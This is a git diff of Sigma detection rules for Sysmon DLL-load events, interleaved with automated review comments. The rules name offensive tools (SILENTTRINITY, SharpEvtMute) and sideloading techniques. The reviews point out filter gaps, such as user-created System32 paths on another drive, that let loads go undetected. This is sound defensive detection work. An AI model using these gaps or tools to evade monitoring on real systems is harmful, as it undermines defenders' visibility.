@@ -27,19 +27,26 @@ detection: selection: ImageLoaded|endswith: \vssapi.dll filter_windows: - - Image: - - C:\Windows\explorer.exe - - C:\Windows\ImmersiveControlPanel\SystemSettings.exe - - Image|startswith: - - C:\Windows\System32\ - - C:\Windows\SysWOW64\ - - C:\Windows\Temp\{ - - C:\Windows\WinSxS\ + - Image: + - C:\Windows\explorer.exe + - C:\Windows\ImmersiveControlPanel\SystemSettings.exe + - Image|startswith: + - C:\Windows\System32\ + - C:\Windows\SysWOW64\ + - C:\Windows\Temp\{ # Installers + - C:\Windows\WinSxS\ filter_program_files: + # When using this rule in your environment replace the "Program Files" folder by the exact applications you know use this. Examples would be software such as backup solutions Image|startswith: - C:\Program Files\ - C:\Program Files (x86)\ filter_programdata_packagecache: + # The following filter is required because of many FPs cause by: + # C:\ProgramData\Package Cache\{10c6cfdc-27af-43fe-bbd3-bd20aae88451}\dotnet-sdk-3.1.425-win-x64.exe + # C:\ProgramData\Package Cache\{b9cfa33e-ace4-49f4-8bb4-82ded940990a}\windowsdesktop-runtime-6.0.11-win-x86.exe + # C:\ProgramData\Package Cache\{50264ff2-ad47-4569-abc4-1c350f285fb9}\aspnetcore-runtime-6.0.11-win-x86.exe + # C:\ProgramData\Package Cache\{2dcef8c3-1563-4149-a6ec-5b6c98500d7d}\dotnet-sdk-6.0.306-win-x64.exe + # etc. Image|startswith: C:\ProgramData\Package Cache\ condition: image_load and (selection and not 1 of filter_*) falsepositives: diff --git a/sigma/sysmon/image_load/image_load_dll_vsstrace_susp_load.yml b/sigma/sysmon/image_load/image_load_dll_vsstrace_susp_load.yml index 6ea9182c0..9df931355 100644 --- a/sigma/sysmon/image_load/image_load_dll_vsstrace_susp_load.yml +++ b/sigma/sysmon/image_load/image_load_dll_vsstrace_susp_load.yml 
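Review bot: `filter_programdata_packagecache` suppresses every vssapi.dll load from any image under `C:\ProgramData\Package Cache\`, and all four examples in the new comment are .NET SDK/runtime installers; the ProgramData tree is in general less tightly permissioned than Program Files, so this exclusion is broader than the evidence justifying it. Consider narrowing the match to the installer names the comment documents (for example a `contains` on `dotnet-sdk-`, `windowsdesktop-runtime-` or `aspnetcore-runtime-`), or at least stating in the comment that the whole cache directory is intentionally excluded. The six-line comment listing full sample paths could also be condensed to one line naming the .NET installers, since the GUID-prefixed paths add no information a reader can act on.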
@@ -1,10 +1,10 @@ title: Suspicious Volume Shadow Copy Vsstrace.dll Load id: 48bfd177-7cf2-412b-ad77-baf923489e82 related: - - id: 333cdbe8-27bb-4246-bf82-b41a0dca4b70 - type: similar - - id: 37774c23-25a1-4adb-bb6d-8bb9fd59c0f8 - type: similar + - id: 333cdbe8-27bb-4246-bf82-b41a0dca4b70 # vss_ps.dll + type: similar + - id: 37774c23-25a1-4adb-bb6d-8bb9fd59c0f8 # vssapi.dll + type: similar status: experimental description: Detects the image load of VSS DLL by uncommon executables references: @@ -27,15 +27,16 @@ detection: selection: ImageLoaded|endswith: \vsstrace.dll filter_windows: - - Image: - - C:\Windows\explorer.exe - - C:\Windows\ImmersiveControlPanel\SystemSettings.exe - - Image|startswith: - - C:\Windows\System32\ - - C:\Windows\SysWOW64\ - - C:\Windows\Temp\{ - - C:\Windows\WinSxS\ + - Image: + - C:\Windows\explorer.exe + - C:\Windows\ImmersiveControlPanel\SystemSettings.exe + - Image|startswith: + - C:\Windows\System32\ + - C:\Windows\SysWOW64\ + - C:\Windows\Temp\{ # Installers + - C:\Windows\WinSxS\ filter_program_files: + # When using this rule in your environment replace the "Program Files" folder by the exact applications you know use this. Examples would be software such as backup solutions Image|startswith: - C:\Program Files\ - C:\Program Files (x86)\ diff --git a/sigma/sysmon/image_load/image_load_hktl_sharpevtmute.yml b/sigma/sysmon/image_load/image_load_hktl_sharpevtmute.yml index e9ac2c50a..db7dd822f 100644 --- a/sigma/sysmon/image_load/image_load_hktl_sharpevtmute.yml +++ b/sigma/sysmon/image_load/image_load_hktl_sharpevtmute.yml 
@@ -1,11 +1,10 @@ title: HackTool - SharpEvtMute DLL Load id: 49329257-089d-46e6-af37-4afce4290685 related: - - id: bedfc8ad-d1c7-4e37-a20e-e2b0dbee759c - type: similar + - id: bedfc8ad-d1c7-4e37-a20e-e2b0dbee759c # Process Creation + type: similar status: test -description: Detects the load of EvtMuteHook.dll, a key component of SharpEvtHook, - a tool that tampers with the Windows event logs +description: Detects the load of EvtMuteHook.dll, a key component of SharpEvtHook, a tool that tampers with the Windows event logs references: - https://github.com/bats3c/EvtMute author: Florian Roth (Nextron Systems) @@ -23,8 +22,8 @@ detection: EventID: 7 Channel: Microsoft-Windows-Sysmon/Operational selection: - - Hashes|contains: IMPHASH=330768A4F172E10ACB6287B87289D83B - - Imphash: 330768a4f172e10acb6287b87289d83b + - Hashes|contains: IMPHASH=330768A4F172E10ACB6287B87289D83B + - Imphash: 330768a4f172e10acb6287b87289d83b condition: image_load and selection falsepositives: - Other DLLs with the same Imphash diff --git a/sigma/sysmon/image_load/image_load_hktl_silenttrinity_stager.yml b/sigma/sysmon/image_load/image_load_hktl_silenttrinity_stager.yml index 79173a521..17ff96d67 100644 --- a/sigma/sysmon/image_load/image_load_hktl_silenttrinity_stager.yml +++ b/sigma/sysmon/image_load/image_load_hktl_silenttrinity_stager.yml @@ -1,8 +1,8 @@ title: HackTool - SILENTTRINITY Stager DLL Load id: 75c505b1-711d-4f68-a357-8c3fe37dbf2d related: - - id: 03552375-cc2c-4883-bbe4-7958d5a980be - type: derived + - id: 03552375-cc2c-4883-bbe4-7958d5a980be # Process Creation + type: derived status: test description: Detects SILENTTRINITY stager dll loading activity references: diff --git a/sigma/sysmon/image_load/image_load_iexplore_dcom_iertutil_dll_hijack.yml b/sigma/sysmon/image_load/image_load_iexplore_dcom_iertutil_dll_hijack.yml index dc39d273d..f4c0be963 100644 --- a/sigma/sysmon/image_load/image_load_iexplore_dcom_iertutil_dll_hijack.yml 
+++ b/sigma/sysmon/image_load/image_load_iexplore_dcom_iertutil_dll_hijack.yml @@ -1,13 +1,12 @@ title: Potential DCOM InternetExplorer.Application DLL Hijack - Image Load id: f354eba5-623b-450f-b073-0b5b2773b6aa related: - - id: e554f142-5cf3-4e55-ace9-a1b59e0def65 - type: obsoletes - - id: 2f7979ae-f82b-45af-ac1d-2b10e93b0baa - type: similar + - id: e554f142-5cf3-4e55-ace9-a1b59e0def65 + type: obsoletes + - id: 2f7979ae-f82b-45af-ac1d-2b10e93b0baa + type: similar status: test -description: Detects potential DLL hijack of "iertutil.dll" found in the DCOM InternetExplorer.Application - Class +description: Detects potential DLL hijack of "iertutil.dll" found in the DCOM InternetExplorer.Application Class references: - https://threathunterplaybook.com/hunts/windows/201009-RemoteDCOMIErtUtilDLLHijack/notebook.html author: Roberto Rodriguez @Cyb3rWard0g, Open Threat Research (OTR), wagga diff --git a/sigma/sysmon/image_load/image_load_office_dotnet_assembly_dll_load.yml b/sigma/sysmon/image_load/image_load_office_dotnet_assembly_dll_load.yml index d07e9eb8f..7c70f6693 100644 --- a/sigma/sysmon/image_load/image_load_office_dotnet_assembly_dll_load.yml +++ b/sigma/sysmon/image_load/image_load_office_dotnet_assembly_dll_load.yml @@ -23,7 +23,7 @@ detection: - \excel.exe - \mspub.exe - \onenote.exe - - \onenoteim.exe + - \onenoteim.exe # Just in case - \outlook.exe - \powerpnt.exe - \winword.exe diff --git a/sigma/sysmon/image_load/image_load_office_dotnet_clr_dll_load.yml b/sigma/sysmon/image_load/image_load_office_dotnet_clr_dll_load.yml index 7ab4b74cd..e74caac3d 100644 --- a/sigma/sysmon/image_load/image_load_office_dotnet_clr_dll_load.yml +++ b/sigma/sysmon/image_load/image_load_office_dotnet_clr_dll_load.yml @@ -24,7 +24,7 @@ detection: - \mspub.exe - \outlook.exe - \onenote.exe - - \onenoteim.exe + - \onenoteim.exe # Just in case - \powerpnt.exe - \winword.exe ImageLoaded|contains: \clr.dll 
diff --git a/sigma/sysmon/image_load/image_load_office_dotnet_gac_dll_load.yml b/sigma/sysmon/image_load/image_load_office_dotnet_gac_dll_load.yml index b4e3fa817..379f80a0f 100644 --- a/sigma/sysmon/image_load/image_load_office_dotnet_gac_dll_load.yml +++ b/sigma/sysmon/image_load/image_load_office_dotnet_gac_dll_load.yml @@ -23,7 +23,7 @@ detection: - \excel.exe - \mspub.exe - \onenote.exe - - \onenoteim.exe + - \onenoteim.exe # Just in case - \outlook.exe - \powerpnt.exe - \winword.exe diff --git a/sigma/sysmon/image_load/image_load_office_dsparse_dll_load.yml b/sigma/sysmon/image_load/image_load_office_dsparse_dll_load.yml index 5d2cef86c..b001206d9 100644 --- a/sigma/sysmon/image_load/image_load_office_dsparse_dll_load.yml +++ b/sigma/sysmon/image_load/image_load_office_dsparse_dll_load.yml @@ -23,7 +23,7 @@ detection: - \excel.exe - \mspub.exe - \onenote.exe - - \onenoteim.exe + - \onenoteim.exe # Just in case - \outlook.exe - \powerpnt.exe - \winword.exe diff --git a/sigma/sysmon/image_load/image_load_office_excel_xll_susp_load.yml b/sigma/sysmon/image_load/image_load_office_excel_xll_susp_load.yml index de2a4656b..280dd650b 100644 --- a/sigma/sysmon/image_load/image_load_office_excel_xll_susp_load.yml +++ b/sigma/sysmon/image_load/image_load_office_excel_xll_susp_load.yml @@ -1,11 +1,10 @@ title: Microsoft Excel Add-In Loaded From Uncommon Location id: af4c4609-5755-42fe-8075-4effb49f5d44 related: - - id: c5f4b5cb-4c25-4249-ba91-aa03626e3185 - type: derived + - id: c5f4b5cb-4c25-4249-ba91-aa03626e3185 + type: derived status: experimental -description: Detects Microsoft Excel loading an Add-In (.xll) file from an uncommon - location +description: Detects Microsoft Excel loading an Add-In (.xll) file from an uncommon location references: - https://www.mandiant.com/resources/blog/lnk-between-browsers - https://wazuh.com/blog/detecting-xll-files-used-for-dropping-fin7-jssloader-with-wazuh/ 
@@ -25,6 +24,7 @@ detection: selection: Image|endswith: \excel.exe ImageLoaded|contains: + # Note: Add or remove locations from this list based on your internal policy - \Desktop\ - \Downloads\ - \Perflogs\ @@ -34,7 +34,6 @@ detection: ImageLoaded|endswith: .xll condition: image_load and selection falsepositives: - - Some tuning might be required to allow or remove certain locations used by the - rule if you consider them as safe locations + - Some tuning might be required to allow or remove certain locations used by the rule if you consider them as safe locations level: medium ruletype: Sigma diff --git a/sigma/sysmon/image_load/image_load_office_kerberos_dll_load.yml b/sigma/sysmon/image_load/image_load_office_kerberos_dll_load.yml index 7a947fa84..ad99ea80d 100644 --- a/sigma/sysmon/image_load/image_load_office_kerberos_dll_load.yml +++ b/sigma/sysmon/image_load/image_load_office_kerberos_dll_load.yml @@ -23,7 +23,7 @@ detection: - \excel.exe - \mspub.exe - \onenote.exe - - \onenoteim.exe + - \onenoteim.exe # Just in case - \outlook.exe - \powerpnt.exe - \winword.exe diff --git a/sigma/sysmon/image_load/image_load_office_outlook_outlvba_load.yml b/sigma/sysmon/image_load/image_load_office_outlook_outlvba_load.yml index c2406620e..a21f93f6b 100644 --- a/sigma/sysmon/image_load/image_load_office_outlook_outlvba_load.yml +++ b/sigma/sysmon/image_load/image_load_office_outlook_outlvba_load.yml @@ -1,8 +1,7 @@ title: Microsoft VBA For Outlook Addin Loaded Via Outlook id: 9a0b8719-cd3c-4f0a-90de-765a4cb3f5ed status: test -description: Detects outlvba (Microsoft VBA for Outlook Addin) DLL being loaded by - the outlook process +description: Detects outlvba (Microsoft VBA for Outlook Addin) DLL being loaded by the outlook process references: - https://speakerdeck.com/heirhabarov/hunting-for-persistence-via-microsoft-exchange-server-or-outlook?slide=58 author: Nasreddine Bencherchali (Nextron Systems) 
diff --git a/sigma/sysmon/image_load/image_load_office_powershell_dll_load.yml b/sigma/sysmon/image_load/image_load_office_powershell_dll_load.yml index 533827602..fca35aad3 100644 --- a/sigma/sysmon/image_load/image_load_office_powershell_dll_load.yml +++ b/sigma/sysmon/image_load/image_load_office_powershell_dll_load.yml @@ -22,7 +22,7 @@ detection: - \mspub.exe - \outlook.exe - \onenote.exe - - \onenoteim.exe + - \onenoteim.exe # Just in case - \powerpnt.exe - \winword.exe ImageLoaded|contains: diff --git a/sigma/sysmon/image_load/image_load_office_vbadll_load.yml b/sigma/sysmon/image_load/image_load_office_vbadll_load.yml index ab3953449..184c90bc0 100644 --- a/sigma/sysmon/image_load/image_load_office_vbadll_load.yml +++ b/sigma/sysmon/image_load/image_load_office_vbadll_load.yml @@ -1,8 +1,7 @@ title: VBA DLL Loaded Via Office Application id: e6ce8457-68b1-485b-9bdd-3c2b5d679aa9 status: test -description: Detects VB DLL's loaded by an office application. Which could indicate - the presence of VBA Macros. +description: Detects VB DLL's loaded by an office application. Which could indicate the presence of VBA Macros. references: - https://medium.com/threatpunter/detecting-adversary-tradecraft-with-image-load-event-logging-and-eql-8de93338c16 author: Antonlovesdnb @@ -24,7 +23,7 @@ detection: - \excel.exe - \mspub.exe - \onenote.exe - - \onenoteim.exe + - \onenoteim.exe # Just in case - \outlook.exe - \powerpnt.exe - \winword.exe diff --git a/sigma/sysmon/image_load/image_load_scrcons_wmi_scripteventconsumer.yml b/sigma/sysmon/image_load/image_load_scrcons_wmi_scripteventconsumer.yml index 37ebadd84..2438c38c0 100644 --- a/sigma/sysmon/image_load/image_load_scrcons_wmi_scripteventconsumer.yml +++ b/sigma/sysmon/image_load/image_load_scrcons_wmi_scripteventconsumer.yml 
@@ -1,8 +1,7 @@ title: WMI ActiveScriptEventConsumers Activity Via Scrcons.EXE DLL Load id: b439f47d-ef52-4b29-9a2f-57d8a96cb6b8 status: test -description: Detects signs of the WMI script host process "scrcons.exe" loading scripting - DLLs which could indicates WMI ActiveScriptEventConsumers EventConsumers activity. +description: Detects signs of the WMI script host process "scrcons.exe" loading scripting DLLs which could indicates WMI ActiveScriptEventConsumers EventConsumers activity. references: - https://twitter.com/HunterPlaybook/status/1301207718355759107 - https://www.mdsec.co.uk/2020/09/i-like-to-move-it-windows-lateral-movement-part-1-wmi-event-subscription/ @@ -33,8 +32,6 @@ detection: condition: image_load and selection falsepositives: - Legitimate event consumers - - Dell computers on some versions register an event consumer that is known to - cause false positives when brightness is changed by the corresponding keyboard - button + - Dell computers on some versions register an event consumer that is known to cause false positives when brightness is changed by the corresponding keyboard button level: medium ruletype: Sigma diff --git a/sigma/sysmon/image_load/image_load_side_load_7za.yml b/sigma/sysmon/image_load/image_load_side_load_7za.yml index 037bbe36e..769c2af08 100644 --- a/sigma/sysmon/image_load/image_load_side_load_7za.yml +++ b/sigma/sysmon/image_load/image_load_side_load_7za.yml @@ -31,8 +31,6 @@ detection: - C:\Program Files\ condition: image_load and (selection and not 1 of filter_main_*) falsepositives: - - Legitimate third party application located in "AppData" may leverage this DLL - to offer 7z compression functionality and may generate false positives. Apply - additional filters as needed. + - Legitimate third party application located in "AppData" may leverage this DLL to offer 7z compression functionality and may generate false positives. Apply additional filters as needed. level: low ruletype: Sigma 
diff --git a/sigma/sysmon/image_load/image_load_side_load_abused_dlls_susp_paths.yml b/sigma/sysmon/image_load/image_load_side_load_abused_dlls_susp_paths.yml index 6f3ba5cd9..86129421e 100644 --- a/sigma/sysmon/image_load/image_load_side_load_abused_dlls_susp_paths.yml +++ b/sigma/sysmon/image_load/image_load_side_load_abused_dlls_susp_paths.yml @@ -1,8 +1,7 @@ title: Abusable DLL Potential Sideloading From Suspicious Location id: 799a5f48-0ac1-4e0f-9152-71d137d48c2a status: experimental -description: Detects potential DLL sideloading of DLLs that are known to be abused - from suspicious locations +description: Detects potential DLL sideloading of DLLs that are known to be abused from suspicious locations references: - https://www.trendmicro.com/en_us/research/23/f/behind-the-scenes-unveiling-the-hidden-workings-of-earth-preta.html - https://research.checkpoint.com/2023/beyond-the-horizon-traveling-the-world-on-camaro-dragons-usb-flash-drives/ @@ -21,6 +20,7 @@ detection: Channel: Microsoft-Windows-Sysmon/Operational selection_dll: ImageLoaded|endswith: + # Note: Add more generic DLLs that cannot be pin-pointed to a single application - \coreclr.dll - \facesdk.dll - \HPCustPartUI.dll @@ -33,18 +33,18 @@ detection: - \Temporary Internet - \Windows\Temp\ selection_folders_2: - - ImageLoaded|contains|all: - - :\Users\ - - \Favorites\ - - ImageLoaded|contains|all: - - :\Users\ - - \Favourites\ - - ImageLoaded|contains|all: - - :\Users\ - - \Contacts\ - - ImageLoaded|contains|all: - - :\Users\ - - \Pictures\ + - ImageLoaded|contains|all: + - :\Users\ + - \Favorites\ + - ImageLoaded|contains|all: + - :\Users\ + - \Favourites\ + - ImageLoaded|contains|all: + - :\Users\ + - \Contacts\ + - ImageLoaded|contains|all: + - :\Users\ + - \Pictures\ condition: image_load and (selection_dll and 1 of selection_folders_*) falsepositives: - Unknown 
diff --git a/sigma/sysmon/image_load/image_load_side_load_antivirus.yml b/sigma/sysmon/image_load/image_load_side_load_antivirus.yml index 2f25552ee..e4ab80afd 100644 --- a/sigma/sysmon/image_load/image_load_side_load_antivirus.yml +++ b/sigma/sysmon/image_load/image_load_side_load_antivirus.yml @@ -1,10 +1,9 @@ title: Potential Antivirus Software DLL Sideloading id: 552b6b65-df37-4d3e-a258-f2fc4771ae54 status: experimental -description: Detects potential DLL sideloading of DLLs that are part of antivirus - software suchas McAfee, Symantec...etc +description: Detects potential DLL sideloading of DLLs that are part of antivirus software suchas McAfee, Symantec...etc references: - - https://hijacklibs.net/ + - https://hijacklibs.net/ # For list of DLLs that could be sideloaded (search for dlls mentioned here in there) author: Nasreddine Bencherchali (Nextron Systems), Wietze Beukema (project and research) date: 2022/08/17 modified: 2023/03/13 @@ -19,6 +18,7 @@ logsource: category: image_load product: windows detection: + # Bitdefender image_load: EventID: 7 Channel: Microsoft-Windows-Sysmon/Operational @@ -35,12 +35,14 @@ detection: - C:\Program Files\Dell\SARemediation\audit\log.dll filter_log_dll_canon: ImageLoaded|startswith: C:\Program Files\Canon\MyPrinter\ + # F-Secure selection_fsecure: ImageLoaded|endswith: \qrt.dll filter_fsecure: ImageLoaded|startswith: - C:\Program Files\F-Secure\Anti-Virus\ - C:\Program Files (x86)\F-Secure\Anti-Virus\ + # McAfee selection_mcafee: ImageLoaded|endswith: - \ashldres.dll 
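Review bot: In the second hunk of this file the new `# Bitdefender` comment sits directly above `image_load:`, the generic EventID 7/Channel selection shared by the whole rule, so it labels the wrong block; the other vendor comments added in this commit (`# F-Secure`, `# McAfee`, `# CyberArk`, ...) each precede their own `selection_<vendor>` key. It should move to directly above `selection_bitdefender:`, which lies outside this hunk between the image_load block and the Dell/Canon `filter_log_dll_*` entries. As written, a reader scanning the detection section would take the Sysmon channel selection to be Bitdefender-specific.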
@@ -50,41 +52,38 @@ detection: ImageLoaded|startswith: - C:\Program Files\McAfee\ - C:\Program Files (x86)\McAfee\ + # CyberArk selection_cyberark: ImageLoaded|endswith: \vftrace.dll filter_cyberark: ImageLoaded|startswith: - C:\Program Files\CyberArk\Endpoint Privilege Manager\Agent\x32\ - C:\Program Files (x86)\CyberArk\Endpoint Privilege Manager\Agent\x32\ + # Avast selection_avast: ImageLoaded|endswith: \wsc.dll filter_avast: ImageLoaded|startswith: - C:\program Files\AVAST Software\Avast\ - C:\program Files (x86)\AVAST Software\Avast\ + # ESET selection_eset_deslock: ImageLoaded|endswith: \DLPPREM32.dll filter_eset_deslock: ImageLoaded|startswith: - C:\program Files\ESET - C:\program Files (x86)\ESET + # Trend Micro Titanium selection_titanium: ImageLoaded|endswith: \tmdbglog.dll filter_titanium: ImageLoaded|startswith: - C:\program Files\Trend Micro\Titanium\ - C:\program Files (x86)\Trend Micro\Titanium\ - condition: image_load and ((selection_bitdefender and not 1 of filter_log_dll_*) - or (selection_fsecure and not filter_fsecure) or (selection_mcafee and not - filter_mcafee) or (selection_cyberark and not filter_cyberark) or (selection_avast - and not filter_avast) or (selection_titanium and not filter_titanium) or (selection_eset_deslock - and not filter_eset_deslock)) + condition: image_load and ((selection_bitdefender and not 1 of filter_log_dll_*) or (selection_fsecure and not filter_fsecure) or (selection_mcafee and not filter_mcafee) or (selection_cyberark and not filter_cyberark) or (selection_avast and not filter_avast) or (selection_titanium and not filter_titanium) or (selection_eset_deslock and not filter_eset_deslock)) falsepositives: - - Applications that load the same dlls mentioned in the detection section. Investigate - them and filter them out if a lot FPs are caused. - - Dell SARemediation plugin folder (C:\Program Files\Dell\SARemediation\plugin\log.dll) - is known to contain the 'log.dll' file. 
- - The Canon MyPrinter folder 'C:\Program Files\Canon\MyPrinter\' is known to contain - the 'log.dll' file + - Applications that load the same dlls mentioned in the detection section. Investigate them and filter them out if a lot FPs are caused. + - Dell SARemediation plugin folder (C:\Program Files\Dell\SARemediation\plugin\log.dll) is known to contain the 'log.dll' file. + - The Canon MyPrinter folder 'C:\Program Files\Canon\MyPrinter\' is known to contain the 'log.dll' file level: medium ruletype: Sigma diff --git a/sigma/sysmon/image_load/image_load_side_load_aruba_networks_virtual_intranet_access.yml b/sigma/sysmon/image_load/image_load_side_load_aruba_networks_virtual_intranet_access.yml index 2b8f1e61d..4157f0d18 100644 --- a/sigma/sysmon/image_load/image_load_side_load_aruba_networks_virtual_intranet_access.yml +++ b/sigma/sysmon/image_load/image_load_side_load_aruba_networks_virtual_intranet_access.yml @@ -1,8 +1,7 @@ title: Aruba Network Service Potential DLL Sideloading id: 90ae0469-0cee-4509-b67f-e5efcef040f7 status: experimental -description: Detects potential DLL sideloading activity via the Aruba Networks Virtual - Intranet Access "arubanetsvc.exe" process using DLL Search Order Hijacking +description: Detects potential DLL sideloading activity via the Aruba Networks Virtual Intranet Access "arubanetsvc.exe" process using DLL Search Order Hijacking references: - https://twitter.com/wdormann/status/1616581559892545537?t=XLCBO9BziGzD7Bmbt8oMEQ&s=09 author: Nasreddine Bencherchali (Nextron Systems) diff --git a/sigma/sysmon/image_load/image_load_side_load_ccleaner_du.yml b/sigma/sysmon/image_load/image_load_side_load_ccleaner_du.yml index bf8a826b0..55aeaa241 100644 --- a/sigma/sysmon/image_load/image_load_side_load_ccleaner_du.yml +++ b/sigma/sysmon/image_load/image_load_side_load_ccleaner_du.yml 
@@ -31,7 +31,6 @@ detection: - \CCleaner64.exe condition: image_load and (selection and not 1 of filter_main_*) falsepositives: - - False positives could occur from other custom installation paths. Apply additional - filters accordingly. + - False positives could occur from other custom installation paths. Apply additional filters accordingly. level: medium ruletype: Sigma diff --git a/sigma/sysmon/image_load/image_load_side_load_ccleaner_reactivator.yml b/sigma/sysmon/image_load/image_load_side_load_ccleaner_reactivator.yml index 1c4e7e2c4..e6167e543 100644 --- a/sigma/sysmon/image_load/image_load_side_load_ccleaner_reactivator.yml +++ b/sigma/sysmon/image_load/image_load_side_load_ccleaner_reactivator.yml @@ -29,7 +29,6 @@ detection: Image|endswith: \CCleanerReactivator.exe condition: image_load and (selection and not 1 of filter_main_*) falsepositives: - - False positives could occur from other custom installation paths. Apply additional - filters accordingly. + - False positives could occur from other custom installation paths. Apply additional filters accordingly. level: medium ruletype: Sigma diff --git a/sigma/sysmon/image_load/image_load_side_load_classicexplorer32.yml b/sigma/sysmon/image_load/image_load_side_load_classicexplorer32.yml index 67872f025..efc6c5589 100644 --- a/sigma/sysmon/image_load/image_load_side_load_classicexplorer32.yml +++ b/sigma/sysmon/image_load/image_load_side_load_classicexplorer32.yml @@ -1,8 +1,7 @@ title: Potential DLL Sideloading Via ClassicExplorer32.dll id: caa02837-f659-466f-bca6-48bde2826ab4 status: test -description: Detects potential DLL sideloading using ClassicExplorer32.dll from the - Classic Shell software +description: Detects potential DLL sideloading using ClassicExplorer32.dll from the Classic Shell software references: - https://blogs.blackberry.com/en/2022/12/mustang-panda-uses-the-russian-ukrainian-war-to-attack-europe-and-asia-pacific-targets - https://app.any.run/tasks/6d8cabb0-dcda-44b6-8050-28d6ce281687/ 
diff --git a/sigma/sysmon/image_load/image_load_side_load_comctl32.yml b/sigma/sysmon/image_load/image_load_side_load_comctl32.yml index 4304865a8..d064a4ba3 100644 --- a/sigma/sysmon/image_load/image_load_side_load_comctl32.yml +++ b/sigma/sysmon/image_load/image_load_side_load_comctl32.yml @@ -1,8 +1,7 @@ title: Potential DLL Sideloading Via comctl32.dll id: 6360757a-d460-456c-8b13-74cf0e60cceb status: test -description: Detects potential DLL sideloading using comctl32.dll to obtain system - privileges +description: Detects potential DLL sideloading using comctl32.dll to obtain system privileges references: - https://github.com/binderlabs/DirCreate2System - https://github.com/sailay1996/awesome_windows_logical_bugs/blob/60cbb23a801f4c3195deac1cc46df27c225c3d07/dir_create2system.txt diff --git a/sigma/sysmon/image_load/image_load_side_load_coregen.yml b/sigma/sysmon/image_load/image_load_side_load_coregen.yml index f673ffe48..65c0173de 100644 --- a/sigma/sysmon/image_load/image_load_side_load_coregen.yml +++ b/sigma/sysmon/image_load/image_load_side_load_coregen.yml @@ -1,8 +1,7 @@ title: Potential DLL Sideloading Using Coregen.exe id: 0fa66f66-e3f6-4a9c-93f8-4f2610b00171 status: test -description: Detect usage of DLL "coregen.exe" (Microsoft CoreCLR Native Image Generator) - binary to sideload arbitrary DLLs. +description: Detect usage of DLL "coregen.exe" (Microsoft CoreCLR Native Image Generator) binary to sideload arbitrary DLLs. references: - https://lolbas-project.github.io/lolbas/OtherMSBinaries/Coregen/ author: frack113 diff --git a/sigma/sysmon/image_load/image_load_side_load_cpl_from_non_system_location.yml b/sigma/sysmon/image_load/image_load_side_load_cpl_from_non_system_location.yml index 6861e95c8..501c69659 100644 --- a/sigma/sysmon/image_load/image_load_side_load_cpl_from_non_system_location.yml +++ b/sigma/sysmon/image_load/image_load_side_load_cpl_from_non_system_location.yml 
@@ -1,8 +1,7 @@ title: System Control Panel Item Loaded From Uncommon Location id: 2b140a5c-dc02-4bb8-b6b1-8bdb45714cde status: experimental -description: Detects image load events of system control panel items (.cpl) from uncommon - or non-system locations which might be the result of sideloading. +description: Detects image load events of system control panel items (.cpl) from uncommon or non-system locations which might be the result of sideloading. references: - https://www.hexacorn.com/blog/2024/01/06/1-little-known-secret-of-fondue-exe/ - https://www.hexacorn.com/blog/2024/01/01/1-little-known-secret-of-hdwwiz-exe/ @@ -21,8 +20,8 @@ detection: Channel: Microsoft-Windows-Sysmon/Operational selection: ImageLoaded|endswith: - - \hdwwiz.cpl - - \appwiz.cpl + - \hdwwiz.cpl # Usually loaded by hdwwiz.exe + - \appwiz.cpl # Usually loaded by fondue.exe filter_main_legit_location: ImageLoaded|contains: - :\Windows\System32\ diff --git a/sigma/sysmon/image_load/image_load_side_load_dbgcore_dll.yml b/sigma/sysmon/image_load/image_load_side_load_dbgcore_dll.yml index 60b20f7e7..5bb8dcbd8 100644 --- a/sigma/sysmon/image_load/image_load_side_load_dbgcore_dll.yml +++ b/sigma/sysmon/image_load/image_load_side_load_dbgcore_dll.yml @@ -3,7 +3,7 @@ id: 9ca2bf31-0570-44d8-a543-534c47c33ed7 status: experimental description: Detects DLL sideloading of "dbgcore.dll" references: - - https://hijacklibs.net/ + - https://hijacklibs.net/ # For list of DLLs that could be sideloaded (search for dlls mentioned here in there) author: Nasreddine Bencherchali (Nextron Systems), Wietze Beukema (project and research) date: 2022/10/25 modified: 2023/05/05 
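Review bot: `filter_main_legit_location` uses `ImageLoaded|contains: ':\Windows\System32\'`, which is drive-letter agnostic: a `D:\Windows\System32\appwiz.cpl` created on a secondary or removable volume (something a standard user can typically do) would be excluded from detection together with the real system copy. If only the system volume is meant, `ImageLoaded|startswith: 'C:\Windows\System32\'` is tighter; if the drive-agnostic form is deliberate to cope with non-standard system drives, a comment such as `# Note: matches any drive letter; a user-created D:\Windows\System32\ is filtered as well` documents the gap. The filter's remaining entries continue past the end of the hunk, so the same consideration applies to any `SysWOW64` entry there. The new `# Usually loaded by hdwwiz.exe` / `# Usually loaded by fondue.exe` comments are helpful, but since `selection` does not constrain `Image`, it may be worth stating that loads by any other process are intentionally in scope.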
@@ -36,7 +36,6 @@ detection: ImageLoaded|endswith: \Steam\bin\cef\cef.win7x64\dbgcore.dll condition: image_load and (selection and not 1 of filter_main_* and not 1 of filter_optional_*) falsepositives: - - Legitimate applications loading their own versions of the DLL mentioned in this - rule + - Legitimate applications loading their own versions of the DLL mentioned in this rule level: medium ruletype: Sigma diff --git a/sigma/sysmon/image_load/image_load_side_load_dbghelp_dll.yml b/sigma/sysmon/image_load/image_load_side_load_dbghelp_dll.yml index b2b48ef70..01e5b96df 100644 --- a/sigma/sysmon/image_load/image_load_side_load_dbghelp_dll.yml +++ b/sigma/sysmon/image_load/image_load_side_load_dbghelp_dll.yml @@ -3,7 +3,7 @@ id: 6414b5cd-b19d-447e-bb5e-9f03940b5784 status: experimental description: Detects DLL sideloading of "dbghelp.dll" references: - - https://hijacklibs.net/ + - https://hijacklibs.net/ # For list of DLLs that could be sideloaded (search for dlls mentioned here in there) author: Nasreddine Bencherchali (Nextron Systems), Wietze Beukema (project and research) date: 2022/10/25 modified: 2023/05/05 @@ -42,7 +42,6 @@ detection: - \Epic Games\MagicLegends\x86\dbghelp.dll condition: image_load and (selection and not 1 of filter_main_* and not 1 of filter_optional_*) falsepositives: - - Legitimate applications loading their own versions of the DLL mentioned in this - rule + - Legitimate applications loading their own versions of the DLL mentioned in this rule level: medium ruletype: Sigma diff --git a/sigma/sysmon/image_load/image_load_side_load_from_non_system_location.yml b/sigma/sysmon/image_load/image_load_side_load_from_non_system_location.yml index 501661089..de3b4925f 100644 --- a/sigma/sysmon/image_load/image_load_side_load_from_non_system_location.yml +++ b/sigma/sysmon/image_load/image_load_side_load_from_non_system_location.yml 
